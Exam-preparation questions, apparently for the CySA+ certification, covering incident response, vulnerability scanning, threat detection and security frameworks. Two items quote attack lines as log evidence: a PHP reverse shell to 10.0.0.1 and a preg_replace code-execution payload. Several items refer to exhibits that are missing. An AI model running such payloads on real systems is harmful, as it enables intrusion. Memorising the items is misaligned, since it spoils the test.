CYSA + 003 100 - 150

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?. Scan the employee's computer with virus and malware tools. Review the actions taken by the employee and the email related to the event. Contact human resources and recommend the termination of the employee. Assign security awareness training to the employee involved in the incident.

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?. Code analysis. Static analysis. Reverse engineering. Fuzzing.

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture: • DNS traffic while a tunneling session is active. • The mean time between queries is less than one second. • The average query length exceeds 100 characters. Which of the following attacks most likely occurred?. DNS exfiltration. DNS spoofing. DNS zone transfer. DNS poisoning.

A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?. Corrective controls. Compensating controls. Operational controls. Administrative controls.

During the log analysis phase, the following suspicious command is detected: <?php preg_replace('/.*/e', 'system("ping -c 4 10.0.0.1");', ''); ?> Which of the following is being attempted?. Buffer overflow. RCE. ICMP tunneling. Smurf attack.

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?. DKIM. SPF. SMTP. DMARC.

A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?. XDR logs. Firewall logs. IDS logs. MFA logs.

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?. To provide metrics and test continuity controls. To verify the roles of the incident response team. To provide recommendations for handling vulnerabilities. To perform tests against implemented security controls.

A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?. Perform non-credentialed scans. Ignore embedded web server ports. Create a tailored scan for the printer subnet. Increase the threshold length of the scan timeout.

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project: • Must use minimal network bandwidth • Must use minimal host resources • Must provide accurate, near real-time updates • Must not have any stored credentials in configuration on the scanner Which of the following vulnerability scanning methods should be used to best meet these requirements?. Internal. Agent. Active. Uncredentialed.

An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?. RFI. LFI. CSRF. XSS.

Which of the following does "federation" most likely refer to within the context of identity and access management?. Facilitating groups of users in a similar function or profile to system access that requires elevated or conditional access. An authentication mechanism that allows a user to utilize one set of credentials to access multiple domains. Utilizing a combination of what you know who you are, and what you have to grant authentication to a user. Correlating one's identity with the attributes and associated applications the user has access to.

Which of the following tools would work best to prevent the exposure of PII outside of an organization?. PAM. IDS. PKI. DLP.

An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?. Hard disk. Primary boot partition. Malicious files. Routing table. Static IP address.

The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.). SOAR. SIEM. MSP. NGFW. XDR. DLP.

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?. Hacktivist threat. Advanced persistent threat. Unintentional insider threat. Nation-state threat.

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?. A local red team member is enumerating the local RFC1918 segment to enumerate hosts. A threat actor has a foothold on the network and is sending out control beacons. An administrator executed a new database replication process without notifying the SOC. An insider threat actor is running Responder on the local segment, creating traffic replication.

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?. Cross-reference the signature with open-source threat intelligence. Configure the EDR to perform a full scan. Transfer the malware to a sandbox environment. Log in to the affected systems and run netstat.

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?. Log retention. Log rotation. Maximum log size. Threshold value.

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?. Risk register. Vulnerability assessment. Penetration test. Compliance report.

While reviewing web server logs, a security analyst discovers the following suspicious line: php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’ Which of the following is being attempted?. Remote file inclusion. Command injection. Server-side request forgery. Reverse shell.

Which of the following should be updated after a lessons-learned review?. Disaster recovery plan. Business continuity plan. Tabletop exercise. Incident response plan.

A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?. Perform static analyses using an integrated development environment. Deploy compensating controls into the environment. Implement server-side logging and automatic updates. Conduct regular code reviews using OWASP best practices.

An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?. OpenVAS. Angry IP Scanner. Wireshark. Maltego.

Which of the following security operations tasks are ideal for automation?. Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on category of graphics found. Move the suspicious graphics to the appropriate subfolder. Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit Take mitigating actions in the firewall to block the behavior found in the logs Follow up on any false positives that were caused by the block rules. Security application user errors: Search the error logs for signs of users having trouble with the security application Look up the user's phone number - Call the user to help with any questions about using the application. Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five Add the domain of sender to the block list Move the email to quarantine.

Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?. Delivery. Reconnaissance. Exploitation. Weaponization.

An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?. CIS Benchmarks. PCI DSS. OWASP Top Ten. ISO 27001.

A security analyst reviews the following Arachni scan results for a web application that stores PII data: Which of the following should be remediated first?. SQL injection. RFI. XSS. Code injection.

Which of the following stakeholders are most likely to receive a vulnerability scan report? (Choose two.). Executive management. Law enforcement. Marketing. Legal. Product owner. Systems administration.

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?. Enrich the SIEM-ingested data to include all data required for triage. Schedule a task to disable alerting when vulnerability scans are executing. Filter all alarms in the SIEM with low seventy. Add a SOAR rule to drop irrelevant and duplicated notifications.

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?. The finding is a false positive and should be ignored. A rollback had been executed on the instance. The vulnerability scanner was configured without credentials. The vulnerability management software needs to be updated.

A company has decided to expose several systems to the internet. The systems are currently available internally only. A security analyst is using a subset of CVSS3.1 exploitability metrics to prioritize the vulnerabilities that would be the most exploitable when the systems are exposed to the internet. The systems and the vulnerabilities are shown below: Which of the following systems should be prioritized for patching?. brown. grey. blane. sullivan.

During an incident in which a user machine was compromised, an analyst recovered a binary file that potentially caused the exploitation. Which of the following techniques could be used for further analysis?. Fuzzing. Static analysis. Sandboxing. Packet capture.

A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?. Assigning a custom recommendation for each finding. Analyzing false positives. Rendering an additional executive report. Regularly checking agent communication with the central console.

The Chief Information Security Officer (CISO) of a large management firm has selected a cybersecurity framework that will help the organization demonstrate its investment in tools and systems to protect its data. Which of the following did the CISO most likely select?. PCI DSS. COBIT. ISO 27001. ITIL.

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?. PCI Security Standards Council. Local law enforcement. Federal law enforcement. Card issuer.

A high volume of failed RDP authentication attempts was logged on a critical server within a one-hour period. All of the attempts originated from the same remote IP address and made use of a single valid domain user account. Which of the following would be the most effective mitigating control to reduce the rate of success of this brute-force attack?. Enabling a user account lockout after a limited number of failed attempts. Installing a third-party remote access tool and disabling RDP on all devices. Implementing a firewall block for the remote system's IP address. Increasing the verbosity of log-on event auditing on all devices.

An incident response analyst is investigating the root cause of a recent malware outbreak. Initial binary analysis indicates that this malware disables host security services and performs cleanup routines on its infected hosts, including deletion of initial dropper and removal of event log entries and prefetch files from the host. Which of the following data sources would most likely reveal evidence of the root cause? (Choose two.). Creation time of dropper. Registry artifacts. EDR data. Prefetch files. File system metadata. Sysmon event log.

When undertaking a cloud migration of multiple SaaS applications, an organization's systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?. CASB. SASE. ZTNA. SWG.

A security analyst reviews the following extract of a vulnerability scan that was performed against the web server: Which of the following recommendations should the security analyst provide to harden the web server?. Remove the version information on http-server-header. Disable tcp_wrappers. Delete the /wp-login.php folder. Close port 22.

A security analyst is responding to an incident that involves a malicious attack on a network data closet. Which of the following best explains how the analyst should properly document the incident?. Back up the configuration file for all network devices. Record and validate each connection. Create a full diagram of the network infrastructure. Take photos of the impacted items.

A cybersecurity analyst is participating with the DLP project team to classify the organization's data. Which of the following is the primary purpose for classifying data?. To identify regulatory compliance requirements. To facilitate the creation of DLP rules. To prioritize IT expenses. To establish the value of data to the organization.

A security analyst observed the following activity from a privileged account: • Accessing emails and sensitive information • Audit logs being modified • Abnormal log-in times Which of the following best describes the observed activity?. Irregular peer-to-peer communication. Unauthorized privileges. Rogue devices on the network. Insider attack.

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?. A vulnerability that has related threats and IoCs, targeting a different industry. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM. A vulnerability that has no adversaries using it or associated IoCs. A vulnerability that is related to an isolated system, with no IoCs.

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following: Which of the following are most likely occurring, base on the MFA logs? (Choose two.). Dictionary attack. Push phishing. Impossible geo-velocity. Subscriber identity module swapping. Rogue access point. Password spray.

A security analyst has identified a new malware file that has impacted the organization. The malware is polymorphic and has built-in conditional triggers that require a connection to the internet. The CPU has an idle process of at least 70%. Which of the following best describes how the security analyst can effectively review the malware without compromising the organization’s network?. Utilize an RDP session on an unused workstation to evaluate the malware. Disconnect and utilize an existing infected asset off the network. Create a virtual host for testing on the security analyst workstation. Subscribe to an online service to create a sandbox environment.

Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?. Mean time to detect. Number of exploits by tactic. Alert volume. Quantity of intrusion attempts.

Which of the following threat-modeling procedures is in the OWASP Web Security Testing Guide?. Review of security requirements. Compliance checks. Decomposing the application. Security by design.

Which of the following would an organization use to develop a business continuity plan?. A diagram of all systems and interdependent applications. A repository for all the software used by the organization. A prioritized list of critical systems defined by executive leadership. A configuration management database in print at an off-site location.

The management team requests monthly KPI reports on the company’s cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?. Employee turnover. Intrusion attempts. Mean time to detect. Level of preparedness.

Which of the following best describes the key elements of a successful information security program?. Business impact analysis, asset and change management, and security communication plan. Security policy implementation, assignment of roles and responsibilities, and information asset classification. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems.